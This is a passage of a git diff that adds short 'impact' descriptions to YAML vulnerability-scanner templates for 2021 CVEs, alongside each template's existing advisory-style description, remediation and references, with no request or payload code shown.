medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index 77cf0aed79..96c64d4d38 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. + impact: | + An attacker can read or modify sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 7cacd46105..2fa9d84a14 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the Grafana application. remediation: Upgrade to 8.2.3 or higher. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 8a76137bf6..67e1c55a37 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -5,6 +5,8 @@ info: author: bananabr severity: medium description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. + impact: | + An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application. remediation: | Remove or update the default secrets in the Redash setup configuration file. reference: diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index 0c814aa2af..2167551438 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. + impact: | + An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console. remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.' reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 33f0ae7f1a..0f86f1072a 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. + impact: | + The vulnerability can result in unauthorized access to sensitive files or execution of arbitrary code on the affected system. remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. reference: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 74ee536457..11248a4540 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -6,6 +6,8 @@ info: severity: high description: | diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall. remediation: | Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later. reference: diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 447b11884e..6a67190970 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System. reference: diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index d193076532..a2793b89bb 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: medium description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index f375519553..0ff0914bb1 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 9cd1751387..5467530915 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. remediation: | Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 8be3f53307..aaa8c6fadf 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). reference: diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 2da83eb852..c9effa282e 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index b4f316a289..72305e790d 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application. reference: diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index 3835904f12..bea347b816 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index bc51435845..f8060cdde0 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index dc3744cfb3..28d9c41c5b 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". reference: - https://k4m1ll0.com/cve-2021-41653.html diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index 03e2cf0f62..a4d3875408 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -5,6 +5,8 @@ info: author: Bartu Utku SARP severity: high description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). reference: diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 663b8071f4..c860b1fc03 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | Upgrade Apache to version 2.4.50 or apply the relevant patch provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index e5c883f49a..4127bbe56d 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 11c019b1ff..67559a9b6e 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 3dd5b5aa58..8087d67f6b 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -5,6 +5,8 @@ info: author: zsusac severity: medium description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses. + impact: | + An attacker can enumerate valid usernames, which can be used for further attacks such as brute-forcing passwords or launching targeted phishing campaigns. remediation: | Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration. reference: diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 560c718c0c..815f89df16 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -5,6 +5,8 @@ info: author: coldfish severity: medium description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 4a578010b4..360dacae8a 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code and gain unauthorized access to sensitive information. remediation: Upgrade to Apache HTTP Server 2.4.51 or later. reference: - https://httpd.apache.org/security/vulnerabilities_24.html diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 1058575ca9..259dcce225 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of SAP Knowledge Warehouse (>=7.5.1) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 1ee17577c8..3ced4ea073 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device. reference: diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index 219a8d0528..86bf7ec1e0 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -5,6 +5,8 @@ info: author: rschio severity: high description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index e3fdf71b0f..515bd53900 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. reference: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index a881d09707..f7a1704ac3 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite. reference: diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index e4adce3814..8ad682664e 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -5,6 +5,8 @@ info: author: compr00t severity: medium description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index bafb5e3a38..ebdb55cbbd 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 58549fb59a..8a2ad4e719 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index bac0122b2c..f3a0142e41 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, data theft, or defacement. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 5f49502e4e..8c4cb3aad3 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | D-Link DIR-615 devices with firmware 20.06 are susceptible to unauthorized access. An attacker can access the WAN configuration page wan.htm without authentication, which can lead to disclosure of WAN settings, data modification, and/or other unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to the router, potentially compromising the network and exposing sensitive information. remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability and ensure strong and unique passwords are set for router administration. reference: diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 3126a0e8a6..626b46a799 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index bf9a1eb071..54ada33607 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update to a non-vulnerable version of the Online Event Booking and Reservation System. reference: diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index eb95710aca..9f162fcd5d 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TOTOLINK EX1200T 4.1.2cu.5215 is susceptible to authentication bypass. An attacker can bypass login by sending a specific request through formLoginAuth.htm, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the device, potentially leading to further compromise of the network. remediation: | Apply the latest firmware update provided by TOTOLINK to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 725e9dc8ee..e27793fc3d 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -5,6 +5,8 @@ info: author: ajaysenr severity: medium description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Fortinet FortiMail. reference: diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index e749adfb06..2c053432e9 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access and control over the build pipelines, potentially resulting in the execution of arbitrary code or unauthorized modifications. remediation: Upgrade to version v21.3.0. or later. reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index d42bd75e26..ab72aaa058 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to upload malicious files to the server and execute arbitrary code. remediation: | Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 24744107e7..ae973296c2 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution. remediation: | Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions. reference: diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 14e29c8236..2e1ef5fce0 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: high description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. + impact: | + This vulnerability can result in unauthorized access to sensitive files and directories, as well as the execution of arbitrary code on the affected system. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index fd773aac97..4622d2c1e7 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: 